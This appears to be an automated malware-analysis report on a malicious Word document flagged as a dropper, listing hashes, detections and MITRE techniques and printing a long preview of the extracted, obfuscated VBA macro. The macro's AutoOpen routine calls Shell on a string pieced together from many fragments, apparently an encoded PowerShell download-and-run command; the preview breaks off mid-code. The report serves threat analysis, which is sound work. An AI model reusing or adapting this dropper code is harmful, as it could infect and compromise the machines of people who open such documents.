Office (OLE) malware analysis — malicious · 278f558786fef1ee

MALICIOUS

Office (OLE)

110.6 KB Created: 2018-08-15 23:06:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: 85fc7b559b44778ba117245ad70fc8ff SHA-1: 2f9c2119c07e39d894aee89aa939c8a005be901a SHA-256: 278f558786fef1ee2845de6b558fcd7dc6034b5ffe84e67010a7cb968eedc718

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The specific command constructed appears to be obfuscated but likely involves downloading and executing a secondary payload. The ClamAV detection 'Doc.Dropper.Valyria-6668100-0' further supports its role as a dropper.

Heuristics 6

ClamAV: Doc.Dropper.Valyria-6668100-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14202 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14202 bytes
SHA-256: `9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DlLVColizzEq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour Sqr(hMJhB) Hour 40 Error Atn(1) Error CCur(VIPhP) Hour 1 Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644 Hour CDate(BXjnr) Error 8 End Sub Attribute VB_Name = "iHJjMWjDQSX" Function UBitRZz() On Error Resume Next Error Str(60383 * 74581 + aFqLTl / 26537) Error 1085 sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + " " + " " + " " Hour CStr(ozlBQr) Error TimeValue(1) jKlpHQ = " " + " " + " " + " " + " " + " " + " " + " " + "/c" Hour 9 Hour 508 bJFviRjvGM = " " + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " " Hour CDbl(Chjzmf / qmsts) Error Int(587) iiziz = "s" + "E" + "t " + " } " + " " Hour Hex(PTEsFO - bwfAu) Error Round(7) odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA" Error Cos(100) Error 48 SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0" Error FJCrf Error CDec(33) Hour TimeValue(EOCcRo + FsIki) jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A" Hour RMBjpu Error LCase(10409 - HfWZU / aYZAGv + 2002) Error 770 tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M" UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs Hour LEQca Hour CVar(62) End Function Function KiiqiSjUM() On Error Resume Next Error vOjbSk Error 8 Error 431 iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0" Error LNNMW Error TEsaRO Hour CByte(96) wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF" Error 6 Hour 99 Hour Sqr(632) QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$" Hour CDate(93077 * nXfiCf) Hour Tan(3891) WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA" Hour tjcBh Error Int(jfjHMq) Hour 319432244 THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A" Error Int(5) Error 379512492 mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ" Error Sqr(BhXQU + mLvAFH) Hour Sgn(859) Hour Val(jnBLSk) kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A" Error 256125246 Error Fix(24427 * mqvvK) iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E" Error ZBzjXu Error YhzMq ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn" Error Rnd(WqpEZ) Error Int(2211) KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A" Hour Cos(mpsFkj + LwTcI) Hour Str(7557 + dzqBod / rEvjaK / XLlpd) rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B" Error CDec(570) Error Int(428575136) Error Log(IGbDzL) dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA" Error mrKww Error XStoZ SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg" KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv Hour 42 Hour Sin(57135 * FcGSwE + 52046 / lhXUom) End Function Function PRPpATiF() On Error Resume Next Hour Sqr(16449 - 1338) Error CDate(4895) zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab" Hour LCase(1) Hour Log(6) Error 198 GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B ... (truncated)

SHA-256: 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DlLVColizzEq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   Hour Sqr(hMJhB)
   Hour 40
   Error Atn(1)
   Error CCur(VIPhP)
   Hour 1
Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644
   Hour CDate(BXjnr)
   Error 8
End Sub


Attribute VB_Name = "iHJjMWjDQSX"
Function UBitRZz()
On Error Resume Next
Error Str(60383 * 74581 + aFqLTl / 26537)
   Error 1085
sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + "  " + " " + "   "
Hour CStr(ozlBQr)
   Error TimeValue(1)
jKlpHQ = "   " + " " + "  " + " " + " " + " " + " " + " " + "/c"
Hour 9
   Hour 508
bJFviRjvGM = "  " + "  " + " " + "  " + "  " + " " + "   " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " "
Hour CDbl(Chjzmf / qmsts)
   Error Int(587)
iiziz = "s" + "E" + "t " + " } " + " "
Hour Hex(PTEsFO - bwfAu)
   Error Round(7)
odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA"
Error Cos(100)
   Error 48
SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0"
Error FJCrf
   Error CDec(33)
   Hour TimeValue(EOCcRo + FsIki)
jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A"
Hour RMBjpu
   Error LCase(10409 - HfWZU / aYZAGv + 2002)
   Error 770
tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M"
UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs
   Hour LEQca
   Hour CVar(62)
End Function
Function KiiqiSjUM()
On Error Resume Next
Error vOjbSk
   Error 8
   Error 431
iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + "2Ab" + "gB0"
Error LNNMW
   Error TEsaRO
   Hour CByte(96)
wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF"
Error 6
   Hour 99
   Hour Sqr(632)
QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$"
Hour CDate(93077 * nXfiCf)
   Hour Tan(3891)
WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA"
Hour tjcBh
   Error Int(jfjHMq)
   Hour 319432244
THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A"
Error Int(5)
   Error 379512492
mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ"
Error Sqr(BhXQU + mLvAFH)
   Hour Sgn(859)
   Hour Val(jnBLSk)
kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A"
Error 256125246
   Error Fix(24427 * mqvvK)
iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E"
Error ZBzjXu
   Error YhzMq
ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn"
Error Rnd(WqpEZ)
   Error Int(2211)
KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A"
Hour Cos(mpsFkj + LwTcI)
   Hour Str(7557 + dzqBod / rEvjaK / XLlpd)
rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B"
Error CDec(570)
   Error Int(428575136)
   Error Log(IGbDzL)
dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA"
Error mrKww
   Error XStoZ
SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg"
KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv
   Hour 42
   Hour Sin(57135 * FcGSwE + 52046 / lhXUom)
End Function
Function PRPpATiF()
On Error Resume Next
Hour Sqr(16449 - 1338)
   Error CDate(4895)
zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab"
Hour LCase(1)
   Hour Log(6)
   Error 198
GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.